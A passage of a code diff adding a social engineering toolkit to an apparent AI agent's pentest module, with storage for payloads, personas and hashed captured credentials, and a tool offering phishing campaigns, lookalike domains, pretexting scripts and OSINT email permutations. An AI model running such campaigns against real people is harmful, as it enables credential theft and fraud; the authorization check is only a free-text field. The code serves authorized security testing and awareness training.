+  }
+
+  // ========== Payload Storage ==========
+
+  const PAYLOADS_PREFIX = "soceng:payloads:"
+
+  /**
+   * Store payload.
+   */
+  export async function storePayload(
+    payload: SocEngTypes.Payload
+  ): Promise<void> {
+    await storage.set(`${PAYLOADS_PREFIX}${payload.id}`, payload)
+  }
+
+  /**
+   * Get payload.
+   */
+  export async function getPayload(
+    payloadId: string
+  ): Promise<SocEngTypes.Payload | null> {
+    return storage.get<SocEngTypes.Payload>(`${PAYLOADS_PREFIX}${payloadId}`)
+  }
+
+  /**
+   * List payloads.
+   */
+  export async function listPayloads(): Promise<SocEngTypes.Payload[]> {
+    const keys = await storage.list(PAYLOADS_PREFIX)
+    const payloads: SocEngTypes.Payload[] = []
+
+    for (const key of keys) {
+      const payload = await storage.get<SocEngTypes.Payload>(key)
+      if (payload) payloads.push(payload)
+    }
+
+    return payloads.sort((a, b) => b.createdAt - a.createdAt)
+  }
+
+  // ========== Target Group Storage ==========
+
+  const TARGET_GROUPS_PREFIX = "soceng:target-groups:"
+
+  /**
+   * Store target group.
+   */
+  export async function storeTargetGroup(
+    group: SocEngTypes.TargetGroup
+  ): Promise<void> {
+    await storage.set(`${TARGET_GROUPS_PREFIX}${group.id}`, group)
+  }
+
+  /**
+   * Get target group.
+   */
+  export async function getTargetGroup(
+    groupId: string
+  ): Promise<SocEngTypes.TargetGroup | null> {
+    return storage.get<SocEngTypes.TargetGroup>(`${TARGET_GROUPS_PREFIX}${groupId}`)
+  }
+
+  /**
+   * List target groups.
+   */
+  export async function listTargetGroups(): Promise<SocEngTypes.TargetGroup[]> {
+    const keys = await storage.list(TARGET_GROUPS_PREFIX)
+    const groups: SocEngTypes.TargetGroup[] = []
+
+    for (const key of keys) {
+      const group = await storage.get<SocEngTypes.TargetGroup>(key)
+      if (group) groups.push(group)
+    }
+
+    return groups.sort((a, b) => b.createdAt - a.createdAt)
+  }
+
+  // ========== OSINT Storage ==========
+
+  const OSINT_PREFIX = "soceng:osint:"
+
+  /**
+   * Store OSINT result.
+   */
+  export async function storeOSINTResult(
+    result: SocEngTypes.OSINTResult
+  ): Promise<void> {
+    await storage.set(`${OSINT_PREFIX}${result.id}`, result)
+  }
+
+  /**
+   * Get OSINT result.
+   */
+  export async function getOSINTResult(
+    resultId: string
+  ): Promise<SocEngTypes.OSINTResult | null> {
+    return storage.get<SocEngTypes.OSINTResult>(`${OSINT_PREFIX}${resultId}`)
+  }
+
+  /**
+   * List OSINT results.
+   */
+  export async function listOSINTResults(): Promise<SocEngTypes.OSINTResult[]> {
+    const keys = await storage.list(OSINT_PREFIX)
+    const results: SocEngTypes.OSINTResult[] = []
+
+    for (const key of keys) {
+      const result = await storage.get<SocEngTypes.OSINTResult>(key)
+      if (result) results.push(result)
+    }
+
+    return results.sort((a, b) => b.timestamp - a.timestamp)
+  }
+
+  // ========== Persona Storage ==========
+
+  const PERSONAS_PREFIX = "soceng:personas:"
+
+  /**
+   * Store persona.
+   */
+  export async function storePersona(
+    persona: SocEngTypes.Persona
+  ): Promise<void> {
+    await storage.set(`${PERSONAS_PREFIX}${persona.id}`, persona)
+  }
+
+  /**
+   * Get persona.
+   */
+  export async function getPersona(
+    personaId: string
+  ): Promise<SocEngTypes.Persona | null> {
+    return storage.get<SocEngTypes.Persona>(`${PERSONAS_PREFIX}${personaId}`)
+  }
+
+  /**
+   * List personas.
+   */
+  export async function listPersonas(): Promise<SocEngTypes.Persona[]> {
+    const keys = await storage.list(PERSONAS_PREFIX)
+    const personas: SocEngTypes.Persona[] = []
+
+    for (const key of keys) {
+      const persona = await storage.get<SocEngTypes.Persona>(key)
+      if (persona) personas.push(persona)
+    }
+
+    return personas
+  }
+
+  // ========== Credential Hashing ==========
+
+  /**
+   * Hash credential value for storage.
+   * We never store plaintext credentials.
+   */
+  export function hashCredential(value: string): string {
+    return crypto.createHash("sha256").update(value).digest("hex")
+  }
+
+  /**
+   * Store captured credential (hashed).
+   */
+  export async function storeCapturedCredential(
+    credential: SocEngTypes.CapturedCredential
+  ): Promise<void> {
+    // Ensure all field values are hashed
+    const hashedCredential: SocEngTypes.CapturedCredential = {
+      ...credential,
+      fields: Object.fromEntries(
+        Object.entries(credential.fields).map(([key, value]) => [
+          key,
+          hashCredential(String(value)),
+        ])
+      ),
+    }
+    await storage.set(
+      `soceng:credentials:${credential.campaignId}:${credential.id}`,
+      hashedCredential
+    )
+  }
+
+  // ========== Utility Functions ==========
+
+  /**
+   * Clear all storage.
+   */
+  export async function clearAll(): Promise<void> {
+    await storage.clear()
+  }
+
+  /**
+   * Get storage statistics.
+   */
+  export async function getStats(): Promise<{
+    campaigns: number
+    templates: number
+    landingPages: number
+    payloads: number
+    targetGroups: number
+    osintResults: number
+  }> {
+    const [campaigns, templates, landingPages, payloads, targetGroups, osintResults] =
+      await Promise.all([
+        storage.list(CAMPAIGNS_PREFIX),
+        storage.list(TEMPLATES_PREFIX),
+        storage.list(LANDING_PAGES_PREFIX),
+        storage.list(PAYLOADS_PREFIX),
+        storage.list(TARGET_GROUPS_PREFIX),
+        storage.list(OSINT_PREFIX),
+      ])
+
+    return {
+      campaigns: campaigns.length,
+      templates: templates.length,
+      landingPages: landingPages.length,
+      payloads: payloads.length,
+      targetGroups: targetGroups.length,
+      osintResults: osintResults.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/tool.ts b/packages/opencode/src/pentest/soceng/tool.ts
new file mode 100644
index 00000000000..990c9089285
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/tool.ts
@@ -0,0 +1,664 @@
+/**
+ * @fileoverview Social Engineering Tool
+ *
+ * Agent-facing tool for social engineering operations.
+ *
+ * @module pentest/soceng/tool
+ */
+
+import z from "zod"
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Tool } from "../../tool/tool"
+import { SocEngTypes } from "./types"
+
+const execAsync = promisify(exec)
+
+/**
+ * Execute a shell command and return the result.
+ */
+async function execCommand(cmd: string): Promise<{ stdout: string; stderr: string; exitCode: number }> {
+  try {
+    const { stdout, stderr } = await execAsync(cmd, { timeout: 30000 })
+    return { stdout, stderr, exitCode: 0 }
+  } catch (error: unknown) {
+    const err = error as { stdout?: string; stderr?: string; code?: number }
+    return {
+      stdout: err.stdout || "",
+      stderr: err.stderr || "",
+      exitCode: err.code || 1,
+    }
+  }
+}
+import { SocEngStorage } from "./storage"
+import { SocEngOrchestrator } from "./orchestrator"
+import { EmailValidation } from "./email/validation"
+import { EmailSpoof } from "./email/spoof"
+import { EmailGenerator } from "./email/generator"
+import { PhishingCampaigns } from "./phishing/campaigns"
+import { PhishingTemplates } from "./phishing/templates"
+import { PhishingLanding } from "./phishing/landing"
+import { PretextingScenarios } from "./pretexting/scenarios"
+import { PretextingPersonas } from "./pretexting/personas"
+import { PretextingScripts } from "./pretexting/scripts"
+import { AwarenessTraining } from "./awareness/training"
+import { AwarenessMetrics } from "./awareness/metrics"
+import { AwarenessReporting } from "./awareness/reporting"
+
+/**
+ * Social Engineering Tool.
+ */
+export const SocEngTool = Tool.define("soceng", async () => {
+  return {
+    description: `Social engineering toolkit for authorized security assessments.
+
+IMPORTANT: This tool is for AUTHORIZED penetration testing and security awareness only.
+All activities must have explicit written authorization.
+
+Actions:
+  Email Security:
+    email-security     - Assess domain email security (SPF/DKIM/DMARC)
+    spoof-assessment   - Assess spoofing vulnerability
+    lookalike-domains  - Generate lookalike domains for awareness
+
+  Phishing Campaigns:
+    create-campaign    - Create a phishing campaign
+    list-campaigns     - List all campaigns
+    campaign-status    - Get campaign statistics
+    campaign-report    - Generate detailed campaign report
+    import-targets     - Import targets from CSV
+
+  Templates:
+    list-templates     - List phishing email templates
+    generate-template  - Generate email template
+    list-landing-pages - List landing page templates
+
+  Pretexting:
+    list-scenarios     - List pretexting scenarios
+    scenario-details   - Get scenario details
+    list-personas      - List available personas
+    persona-details    - Get persona details
+    get-script         - Get call script
+
+  Reconnaissance:
+    recon-queries      - Generate OSINT search queries
+    email-permutations - Generate email permutations
+
+  Awareness:
+    list-training      - List training modules
+    training-content   - Get training content
+    campaign-metrics   - Calculate awareness metrics
+    executive-summary  - Generate executive summary
+
+  Session:
+    start-session      - Start a new session
+    session-status     - Get session status
+    end-session        - End current session
+
+  Other:
+    list-profiles      - List campaign profiles
+    help               - Show this help`,
+
+    parameters: z.object({
+      action: z.enum([
+        // Email Security
+        "email-security",
+        "spoof-assessment",
+        "lookalike-domains",
+        // Phishing Campaigns
+        "create-campaign",
+        "list-campaigns",
+        "campaign-status",
+        "campaign-report",
+        "import-targets",
+        // Templates
+        "list-templates",
+        "generate-template",
+        "list-landing-pages",
+        // Pretexting
+        "list-scenarios",
+        "scenario-details",
+        "list-personas",
+        "persona-details",
+        "get-script",
+        // Reconnaissance
+        "recon-queries",
+        "email-permutations",
+        // Awareness
+        "list-training",
+        "training-content",
+        "campaign-metrics",
+        "executive-summary",
+        // Session
+        "start-session",
+        "session-status",
+        "end-session",
+        // Lists
+        "list-profiles",
+        "help",
+      ]),
+      domain: z.string().optional(),
+      campaignId: z.string().optional(),
+      campaignName: z.string().optional(),
+      campaignType: z.enum([
+        "credential-harvest",
+        "payload-delivery",
+        "link-click",
+        "data-entry",
+        "callback",
+        "usb-drop",
+        "awareness-test",
+      ]).optional(),
+      authorization: z.string().optional(),
+      profile: z.string().optional(),
+      templateCategory: z.string().optional(),
+      templateId: z.string().optional(),
+      scenarioId: z.string().optional(),
+      personaId: z.string().optional(),
+      scriptId: z.string().optional(),
+      moduleId: z.string().optional(),
+      firstName: z.string().optional(),
+      lastName: z.string().optional(),
+      sessionType: z.enum(["phishing", "pretext", "recon", "awareness"]).optional(),
+      targetsCSV: z.string().optional(),
+    }),
+
+    async execute(input, ctx): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+      try {
+        switch (input.action) {
+          // ========== Email Security ==========
+          case "email-security": {
+            if (!input.domain) {
+              return {
+                title: "Error: domain required",
+                output: "Error: domain is required for email-security action",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const assessment = await EmailValidation.assessEmailSecurity(input.domain, execCommand)
+            return {
+              title: `Email security for ${input.domain}`,
+              output: EmailValidation.formatAssessment(assessment),
+              metadata: { action: input.action, domain: input.domain, status: "completed" },
+            }
+          }
+
+          case "spoof-assessment": {
+            if (!input.domain) {
+              return {
+                title: "Error: domain required",
+                output: "Error: domain is required for spoof-assessment action",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const security = await EmailValidation.assessEmailSecurity(input.domain, execCommand)
+            const spoof = await EmailSpoof.assessSpoofVulnerability(input.domain, security)
+            return {
+              title: `Spoof assessment for ${input.domain}`,
+              output: EmailSpoof.formatAssessment(spoof),
+              metadata: { action: input.action, domain: input.domain, status: "completed" },
+            }
+          }
+
+          case "lookalike-domains": {
+            if (!input.domain) {
+              return {
+                title: "Error: domain required",
+                output: "Error: domain is required for lookalike-domains action",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const lookalikes = EmailSpoof.generateLookalikes(input.domain)
+            const lines = ["Lookalike Domains", "=".repeat(40)]
+            for (const l of lookalikes.slice(0, 30)) {
+              lines.push(`  ${l.domain} (${l.technique}, ${Math.round(l.similarity * 100)}%)`)
+            }
+            return {
+              title: `Lookalike domains for ${input.domain}`,
+              output: lines.join("\n"),
+              metadata: { action: input.action, domain: input.domain, count: lookalikes.length, status: "completed" },
+            }
+          }
+
+          // ========== Phishing Campaigns ==========
+          case "create-campaign": {
+            if (!input.campaignName || !input.campaignType || !input.authorization) {
+              return {
+                title: "Error: missing parameters",
+                output: "Error: campaignName, campaignType, and authorization are required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const campaign = await SocEngOrchestrator.createPhishingCampaign({
+              name: input.campaignName,
+              type: input.campaignType,
+              authorization: input.authorization,
+              profile: input.profile,
+              templateCategory: input.templateCategory,
+              targetDomain: input.domain,
+            })
+            return {
+              title: `Campaign created: ${campaign.id}`,
+              output: PhishingCampaigns.formatCampaignSummary(campaign),
+              metadata: { action: input.action, campaignId: campaign.id, status: "completed" },
+            }
+          }
+
+          case "list-campaigns": {
+            const campaigns = await SocEngStorage.getAllCampaigns()
+            if (campaigns.length === 0) {
+              return {
+                title: "No campaigns",
+                output: "No campaigns found",
+                metadata: { action: input.action, count: 0, status: "completed" },
+              }
+            }
+            const lines = ["Campaigns", "=".repeat(40)]
+            for (const c of campaigns) {
+              lines.push(`  ${c.id}: ${c.name} (${c.status})`)
+              lines.push(`    Type: ${c.type}, Targets: ${c.targets.length}`)
+            }
+            return {
+              title: `${campaigns.length} campaign(s)`,
+              output: lines.join("\n"),
+              metadata: { action: input.action, count: campaigns.length, status: "completed" },
+            }
+          }
+
+          case "campaign-status": {
+            if (!input.campaignId) {
+              return {
+                title: "Error: campaignId required",
+                output: "Error: campaignId is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const stats = await PhishingCampaigns.getStatistics(input.campaignId)
+            return {
+              title: `Campaign ${input.campaignId} status`,
+              output: PhishingCampaigns.formatStatistics(stats),
+              metadata: { action: input.action, campaignId: input.campaignId, status: "completed" },
+            }
+          }
+
+          case "campaign-report": {
+            if (!input.campaignId) {
+              return {
+                title: "Error: campaignId required",
+                output: "Error: campaignId is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const campaign = await SocEngStorage.getCampaign(input.campaignId)
+            if (!campaign) {
+              return {
+                title: "Campaign not found",
+                output: `Campaign not found: ${input.campaignId}`,
+                metadata: { action: input.action, campaignId: input.campaignId, status: "error" },
+              }
+            }
+            const report = AwarenessReporting.generateCampaignReport(campaign)
+            return {
+              title: `Campaign ${input.campaignId} report`,
+              output: AwarenessReporting.formatCampaignReport(report),
+              metadata: { action: input.action, campaignId: input.campaignId, status: "completed" },
+            }
+          }
+
+          case "import-targets": {
+            if (!input.campaignId || !input.targetsCSV) {
+              return {
+                title: "Error: missing parameters",
+                output: "Error: campaignId and targetsCSV are required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const targets = PhishingCampaigns.parseTargetsFromCSV(input.targetsCSV)
+            await PhishingCampaigns.addTargets(input.campaignId, targets)
+            return {
+              title: `Imported ${targets.length} targets`,
+              output: `Imported ${targets.length} targets to campaign ${input.campaignId}`,
+              metadata: { action: input.action, campaignId: input.campaignId, count: targets.length, status: "completed" },
+            }
+          }
+
+          // ========== Templates ==========
+          case "list-templates": {
+            return {
+              title: "Phishing templates",
+              output: PhishingTemplates.formatTemplateList(),
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          case "generate-template": {
+            const category = input.templateCategory || "generic"
+            const template = EmailGenerator.generateTemplate({
+              category,
+              company: input.domain?.split(".")[0],
+              senderDomain: input.domain,
+            })
+            const lines = [
+              `Generated Template: ${template.name}`,
+              "=".repeat(40),
+              `Subject: ${template.subject}`,
+              `Sender: ${template.sender.name} <${template.sender.email}>`,
+              "",
+              "Variables:",
+              ...template.variables.map((v) => `  ${v}`),
+            ]
+            return {
+              title: `Generated template: ${template.name}`,
+              output: lines.join("\n"),
+              metadata: { action: input.action, templateName: template.name, status: "completed" },
+            }
+          }
+
+          case "list-landing-pages": {
+            return {
+              title: "Landing page templates",
+              output: PhishingLanding.formatTemplateList(),
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          // ========== Pretexting ==========
+          case "list-scenarios": {
+            return {
+              title: "Pretexting scenarios",
+              output: PretextingScenarios.formatScenarioList(),
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          case "scenario-details": {
+            if (!input.scenarioId) {
+              return {
+                title: "Error: scenarioId required",
+                output: "Error: scenarioId is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const scenario = PretextingScenarios.getScenario(input.scenarioId)
+            if (!scenario) {
+              return {
+                title: "Scenario not found",
+                output: `Scenario not found: ${input.scenarioId}`,
+                metadata: { action: input.action, scenarioId: input.scenarioId, status: "error" },
+              }
+            }
+            return {
+              title: `Scenario: ${scenario.name}`,
+              output: PretextingScenarios.formatScenarioDetails(scenario),
+              metadata: { action: input.action, scenarioId: input.scenarioId, status: "completed" },
+            }
+          }
+
+          case "list-personas": {
+            return {
+              title: "Pretexting personas",
+              output: PretextingPersonas.formatPersonaList(),
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          case "persona-details": {
+            if (!input.personaId) {
+              return {
+                title: "Error: personaId required",
+                output: "Error: personaId is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const persona = PretextingPersonas.getPersona(input.personaId)
+            if (!persona) {
+              return {
+                title: "Persona not found",
+                output: `Persona not found: ${input.personaId}`,
+                metadata: { action: input.action, personaId: input.personaId, status: "error" },
+              }
+            }
+            return {
+              title: `Persona: ${persona.name}`,
+              output: PretextingPersonas.formatPersonaDetails(persona),
+              metadata: { action: input.action, personaId: input.personaId, status: "completed" },
+            }
+          }
+
+          case "get-script": {
+            if (!input.scriptId) {
+              return {
+                title: "Error: scriptId required",
+                output: "Error: scriptId is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const script = PretextingScripts.getScript(input.scriptId)
+            if (!script) {
+              return {
+                title: "Script not found",
+                output: `Script not found: ${input.scriptId}`,
+                metadata: { action: input.action, scriptId: input.scriptId, status: "error" },
+              }
+            }
+            return {
+              title: `Script: ${script.name}`,
+              output: PretextingScripts.formatScript(script),
+              metadata: { action: input.action, scriptId: input.scriptId, status: "completed" },
+            }
+          }
+
+          // ========== Reconnaissance ==========
+          case "recon-queries": {
+            if (!input.domain) {
+              return {
+                title: "Error: domain required",
+                output: "Error: domain is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const queries = SocEngOrchestrator.generateReconQueries({
+              domain: input.domain,
+            })
+            const lines = ["OSINT Search Queries", "=".repeat(40)]
+            for (const [category, categoryQueries] of Object.entries(queries)) {
+              lines.push(`\n${category.toUpperCase()}:`)
+              for (const [name, query] of Object.entries(categoryQueries as Record<string, string>)) {
+                lines.push(`  ${name}: ${query}`)
+              }
+            }
+            return {
+              title: `Recon queries for ${input.domain}`,
+              output: lines.join("\n"),
+              metadata: { action: input.action, domain: input.domain, status: "completed" },
+            }
+          }
+
+          case "email-permutations": {
+            if (!input.firstName || !input.lastName || !input.domain) {
+              return {
+                title: "Error: missing parameters",
+                output: "Error: firstName, lastName, and domain are required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const perms = SocEngOrchestrator.generateEmailPermutations(
+              input.firstName,
+              input.lastName,
+              input.domain
+            )
+            const lines = ["Email Permutations", "=".repeat(40)]
+            for (const email of perms) {
+              lines.push(`  ${email}`)
+            }
+            return {
+              title: `Email permutations for ${input.firstName} ${input.lastName}`,
+              output: lines.join("\n"),
+              metadata: { action: input.action, count: perms.length, status: "completed" },
+            }
+          }
+
+          // ========== Awareness ==========
+          case "list-training": {
+            return {
+              title: "Training modules",
+              output: AwarenessTraining.formatModuleList(),
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          case "training-content": {
+            if (!input.moduleId) {
+              return {
+                title: "Error: moduleId required",
+                output: "Error: moduleId is required",
+                metadata: { action: input.action, status: "error" },
+              }
+            }
+            const module = AwarenessTraining.getModule(input.moduleId)
+            if (!module) {
+              return {
+                title: "Module not found",
+                output: `Module not found: ${input.moduleId}`,
+                metadata: { action: input.action, moduleId: input.moduleId, status: "error" },
+              }
+            }
+            return {
+              title: `Training module: ${module.name}`,
+              output: AwarenessTraining.formatModuleContent(module),
+              metadata: { action: input.action, moduleId: input.moduleId, status: "completed" },
+            }
+          }
+
+          case "campaign-metrics": {
+            const campaigns = await SocEngStorage.getAllCampaigns()
+            if (campaigns.length === 0) {
+              return {
+                title: "No campaigns",
+                output: "No campaigns found for metrics calculation",
+                metadata: { action: input.action, status: "completed" },
+              }
+            }
+            const metrics = AwarenessMetrics.calculatePhishingMetrics(campaigns)
+            return {
+              title: "Campaign metrics",
+              output: AwarenessMetrics.formatPhishingMetrics(metrics),
+              metadata: { action: input.action, campaignCount: campaigns.length, status: "completed" },
+            }
+          }
+
+          case "executive-summary": {
+            const campaigns = await SocEngStorage.getAllCampaigns()
+            if (campaigns.length === 0) {
+              return {
+                title: "No campaigns",
+                output: "No campaigns found for summary",
+                metadata: { action: input.action, status: "completed" },
+              }
+            }
+            const summary = AwarenessReporting.generateExecutiveSummary(campaigns)
+            return {
+              title: "Executive summary",
+              output: AwarenessReporting.formatExecutiveSummary(summary),
+              metadata: { action: input.action, campaignCount: campaigns.length, status: "completed" },
+            }
+          }
+
+          // ========== Session ==========
+          case "start-session": {
+            const sessionType = input.sessionType || "phishing"
+            const session = SocEngOrchestrator.startSession(sessionType, input.domain)
+            return {
+              title: `Session started: ${session.id}`,
+              output: `Session started: ${session.id}`,
+              metadata: { action: input.action, sessionId: session.id, sessionType, status: "completed" },
+            }
+          }
+
+          case "session-status": {
+            return {
+              title: "Session status",
+              output: SocEngOrchestrator.formatSessionSummary(),
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          case "end-session": {
+            SocEngOrchestrator.endSession()
+            return {
+              title: "Session ended",
+              output: "Session ended",
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          // ========== Other ==========
+          case "list-profiles": {
+            const profiles = SocEngOrchestrator.listCampaignProfiles()
+            const lines = ["Campaign Profiles", "=".repeat(40)]
+            for (const p of profiles) {
+              lines.push(`  ${p.id}: ${p.name}`)
+              lines.push(`    ${p.description}`)
+            }
+            return {
+              title: "Campaign profiles",
+              output: lines.join("\n"),
+              metadata: { action: input.action, count: profiles.length, status: "completed" },
+            }
+          }
+
+          case "help": {
+            return {
+              title: "Social Engineering Toolkit Help",
+              output: `Social Engineering Toolkit
+
+IMPORTANT: For authorized security testing only.
+
+Email Security:
+  soceng action=email-security domain=example.com
+  soceng action=spoof-assessment domain=example.com
+  soceng action=lookalike-domains domain=example.com
+
+Phishing:
+  soceng action=create-campaign campaignName="Test" campaignType=credential-harvest authorization="Auth-123"
+  soceng action=list-campaigns
+  soceng action=campaign-status campaignId=<id>
+  soceng action=list-templates
+  soceng action=list-landing-pages
+
+Pretexting:
+  soceng action=list-scenarios
+  soceng action=scenario-details scenarioId=it-password-reset
+  soceng action=list-personas
+  soceng action=persona-details personaId=it-helpdesk
+
+Reconnaissance:
+  soceng action=recon-queries domain=example.com
+  soceng action=email-permutations firstName=John lastName=Doe domain=example.com
+
+Awareness:
+  soceng action=list-training
+  soceng action=training-content moduleId=phishing-basics
+  soceng action=campaign-metrics
+  soceng action=executive-summary`,
+              metadata: { action: input.action, status: "completed" },
+            }
+          }
+
+          default:
+            return {
+              title: `Unknown action: ${input.action}`,
+              output: `Unknown action: ${input.action}`,
+              metadata: { action: input.action, status: "error" },
+            }
+        }
+      } catch (error) {
+        return {
+          title: "Error",
+          output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+          metadata: { action: input.action, status: "error" },
+        }
+      }
+    },
+  }
+})
diff --git a/packages/opencode/src/pentest/soceng/types.ts b/packages/opencode/src/pentest/soceng/types.ts
new file mode 100644
index 00000000000..63ac42cb7f9
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/types.ts
@@ -0,0 +1,657 @@
+/**
+ * @fileoverview Social Engineering Types
+ *
+ * Type definitions for social engineering toolkit.
+ *
+ * IMPORTANT: This module is intended for authorized security testing,
+ * red team engagements, and security awareness training ONLY.
+ *
+ * @module pentest/soceng/types
+ */
+
+import { z } from "zod"
+
+/**
+ * Social engineering types namespace.
+ */
+export namespace SocEngTypes {
+  // ========== Campaign Types ==========
+
+  /**
+   * Campaign types.
+   */
+  export const CampaignTypeSchema = z.enum([
+    "credential-harvest",
+    "payload-delivery",
+    "link-click",
+    "data-entry",
+    "callback",
+    "usb-drop",
+    "awareness-test",
+  ])
+  export type CampaignType = z.infer<typeof CampaignTypeSchema>
+
+  /**
+   * Campaign status.
+   */
+  export const CampaignStatusSchema = z.enum([
+    "draft",
+    "scheduled",
+    "active",
+    "paused",
+    "completed",
+    "cancelled",
+  ])
+  export type CampaignStatus = z.infer<typeof CampaignStatusSchema>
+
+  /**
+   * Target schema.
+   */
+  export const TargetSchema = z.object({
+    id: z.string(),
+    email: z.string().email(),
+    firstName: z.string().optional(),
+    lastName: z.string().optional(),
+    department: z.string().optional(),
+    title: z.string().optional(),
+    phone: z.string().optional(),
+    customFields: z.record(z.string(), z.string()).optional(),
+  })
+  export type Target = z.infer<typeof TargetSchema>
+
+  /**
+   * Target group schema.
+   */
+  export const TargetGroupSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    description: z.string().optional(),
+    targets: z.array(TargetSchema),
+    createdAt: z.number(),
+  })
+  export type TargetGroup = z.infer<typeof TargetGroupSchema>
+
+  /**
+   * Email attachment schema.
+   */
+  export const AttachmentSchema = z.object({
+    name: z.string(),
+    contentType: z.string(),
+    content: z.string(), // base64
+    size: z.number(),
+  })
+  export type Attachment = z.infer<typeof AttachmentSchema>
+
+  /**
+   * Email template schema.
+   */
+  export const EmailTemplateSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    category: z.string(),
+    subject: z.string(),
+    bodyHtml: z.string(),
+    bodyText: z.string(),
+    sender: z.object({
+      name: z.string(),
+      email: z.string(),
+    }),
+    replyTo: z.string().optional(),
+    headers: z.record(z.string(), z.string()).optional(),
+    attachments: z.array(AttachmentSchema).optional(),
+    variables: z.array(z.string()), // {{firstName}}, {{company}}, etc.
+    createdAt: z.number(),
+  })
+  export type EmailTemplate = z.infer<typeof EmailTemplateSchema>
+
+  /**
+   * Landing page type.
+   */
+  export const LandingPageTypeSchema = z.enum([
+    "credential",
+    "download",
+    "form",
+    "redirect",
+    "awareness",
+  ])
+  export type LandingPageType = z.infer<typeof LandingPageTypeSchema>
+
+  /**
+   * Landing page schema.
+   */
+  export const LandingPageSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    type: LandingPageTypeSchema.optional(), // Optional for backwards compatibility
+    html: z.string(),
+    css: z.string().optional(),
+    url: z.string().optional(), // URL where page is hosted
+    templateId: z.string().optional(), // ID of template used to generate
+    captureCredentials: z.boolean().optional(), // Whether this captures credentials
+    captureFields: z.array(z.string()),
+    redirectUrl: z.string().optional(),
+    successMessage: z.string().optional(),
+    showAwarenessTraining: z.boolean().optional(),
+    trainingUrl: z.string().optional(),
+    createdAt: z.number().optional(),
+  })
+  export type LandingPage = z.infer<typeof LandingPageSchema>
+
+  /**
+   * Tracking configuration.
+   */
+  export const TrackingConfigSchema = z.object({
+    trackOpens: z.boolean(),
+    trackClicks: z.boolean(),
+    trackSubmissions: z.boolean(),
+    trackPayloads: z.boolean(),
+    pixelType: z.enum(["image", "invisible"]).optional(),
+    clickTracking: z.enum(["redirect", "proxy"]).optional(),
+  })
+  export type TrackingConfig = z.infer<typeof TrackingConfigSchema>
+
+  /**
+   * Schedule schema.
+   */
+  export const ScheduleSchema = z.object({
+    startTime: z.number(),
+    endTime: z.number().optional(),
+    sendRate: z.number().optional(), // emails per hour
+    randomizeDelay: z.boolean().optional(),
+    workingHoursOnly: z.boolean().optional(),
+    timezone: z.string().optional(),
+  })
+  export type Schedule = z.infer<typeof ScheduleSchema>
+
+  /**
+   * Target status schema.
+   */
+  export const TargetStatusSchema = z.enum([
+    "pending",
+    "sent",
+    "delivered",
+    "bounced",
+    "opened",
+    "clicked",
+    "submitted",
+    "reported",
+  ])
+  export type TargetStatus = z.infer<typeof TargetStatusSchema>
+
+  /**
+   * Target with status (for campaign tracking).
+   */
+  export const TargetWithStatusSchema = TargetSchema.extend({
+    status: TargetStatusSchema.optional(),
+    sentAt: z.number().optional(),
+    openedAt: z.number().optional(),
+    clickedAt: z.number().optional(),
+    submittedAt: z.number().optional(),
+    reportedAt: z.number().optional(),
+  })
+  export type TargetWithStatus = z.infer<typeof TargetWithStatusSchema>
+
+  /**
+   * Embedded results schema (simplified for campaign).
+   */
+  export const EmbeddedResultsSchema = z.object({
+    sent: z.number(),
+    opened: z.number(),
+    clicked: z.number(),
+    submitted: z.number(),
+    reported: z.number(),
+  })
+  export type EmbeddedResults = z.infer<typeof EmbeddedResultsSchema>
+
+  /**
+   * Campaign schema.
+   */
+  export const CampaignSchema = z.object({
+    id: z.string(),
+    name: z.string(),
+    description: z.string().optional(),
+    type: CampaignTypeSchema,
+    status: CampaignStatusSchema,
+    authorization: z.string(), // Authorization reference/ticket
+    targets: z.array(TargetWithStatusSchema),
+    template: EmailTemplateSchema.optional(),
+    templates: z.array(EmailTemplateSchema).optional(),
+    landingPage: LandingPageSchema.optional(),
+    landingPages: z.array(LandingPageSchema).optional(),
+    payloadId: z.string().optional(),
+    schedule: ScheduleSchema.optional(),
+    tracking: TrackingConfigSchema.optional(),
+    smtpProfileId: z.string().optional(),
+    createdAt: z.number(),
+    startedAt: z.number().optional(),
+    completedAt: z.number().optional(),
+    startDate: z.number().optional(),
+    endDate: z.number().optional(),
+    results: EmbeddedResultsSchema.optional(),
+    timeline: z.array(z.object({
+      timestamp: z.number(),
+      event: z.string(),
+      details: z.string().optional(),
+    })).optional(),
+  })
+  export type Campaign = z.infer<typeof CampaignSchema>
+
+  // ========== Tracking & Results ==========
+
+  /**
+   * Timeline event types.
+   */
+  export const TimelineEventTypeSchema = z.enum([
+    "email_sent",
+    "email_opened",
+    "link_clicked",
+    "attachment_opened",
+    "credential_submitted",
+    "form_submitted",
+    "payload_executed",
+    "reported_phish",
+    "training_completed",
+  ])
+  export type TimelineEventType = z.infer<typeof TimelineEventTypeSchema>
+
+  /**
+   * Timeline event schema.
+   */
+  export const TimelineEventSchema = z.object({
+    id: z.string(),
+    campaignId: z.string(),
+    targetId: z.string().optional(), // Optional for campaign-level events
+    type: z.string(), // Flexible to support custom event types
+    timestamp: z.number(),
